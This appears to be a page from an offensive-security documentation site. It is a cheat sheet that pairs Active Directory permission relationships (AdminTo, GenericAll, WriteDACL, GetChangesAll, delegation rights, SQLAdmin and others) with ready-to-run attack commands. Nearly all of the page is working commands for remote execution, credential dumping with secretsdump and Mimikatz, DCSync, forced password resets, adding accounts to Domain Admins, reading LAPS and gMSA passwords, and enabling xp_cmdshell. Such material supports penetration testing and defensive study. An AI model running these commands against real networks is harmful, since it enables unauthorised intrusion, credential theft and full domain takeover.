Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
AdminTo
Full local admin on target computer. Execute code via SMB, WMI, or WinRM.
impacket-psexec 'DOMAIN/USER:Password@TARGET'
impacket-wmiexec 'DOMAIN/USER:Password@TARGET'
evil-winrm -i TARGET -u USER -p 'Password'
CanRDP
Remote Desktop access to target computer.
xfreerdp /u:USER /p:'Password' /d:DOMAIN /v:TARGET
xfreerdp /u:USER /pth:NTHASH /d:DOMAIN /v:TARGET
HasSession
Active user session on computer. If local admin on that host, dump credentials.
impacket-secretsdump 'DOMAIN/USER:Password@TARGET'
Invoke-Mimikatz -ComputerName TARGET
MemberOf
User/group is member of target group. Inherits all rights granted to that group.
GenericAll
Full control over target object. Reset password, add to group, modify attributes.
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET
GenericWrite
Write access to non-protected attributes. Abuse via SPN write or logon script.
Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='fake/spn'}
WriteOwner
Change owner of target object. Take ownership then grant full control.
Set-DomainObjectOwner -Identity TARGET -OwnerIdentity ATTACKER
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All
WriteDACL
Modify the DACL of target object. Grant self any right.
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All
ForceChangePassword
Change user password without knowing current password.
rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"
AddMember
Add any principal to target group.
Add-DomainGroupMember -Identity 'TARGET_GROUP' -Members ATTACKER
AllExtendedRights
All extended rights on object: reset password, read LAPS, Kerberoast.
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
ReadLAPSPassword
Read LAPS local admin password from ms-Mcs-AdmPwd attribute.
Get-DomainComputer TARGET -Properties ms-Mcs-AdmPwd, name
impacket-lapsreader 'DOMAIN/USER:Password@DC01' -computer TARGET
ReadGMSAPassword
Read Group Managed Service Account password.
$gmsa = Get-ADServiceAccount -Identity GMSA_ACCOUNT -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
GetChanges / GetChangesAll
Held together = DCSync rights. Dump domain hashes.
impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-ntlm
AllowedToDelegate
Constrained Delegation. Impersonate any user to target service.
impacket-getST -spn 'cifs/TARGET.domain.local' -impersonate Administrator 'DOMAIN/SVC:Password'
AllowedToAct
Resource-Based Constrained Delegation (RBCD). Write to msDS-AllowedToActOnBehalfOfOtherIdentity.
impacket-rbcd -f ATTACKER_COMPUTER -t TARGET_COMPUTER -dc-ip DC01 'DOMAIN/USER:Password'
SQLAdmin
User has sysadmin rights on MSSQL instance.
impacket-mssqlclient 'DOMAIN/USER:Password@TARGET' -windows-auth
impacket-mssqlclient 'DOMAIN/USER:Password@TARGET' -windows-auth -port 1433
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
HasSIDHistory
Object has foreign SID in sIDHistory. Can be abused for privilege escalation across trusts.
Get-DomainUser -LDAPFilter '(sIDHistory=*)' -Properties samaccountname, sIDHistory
References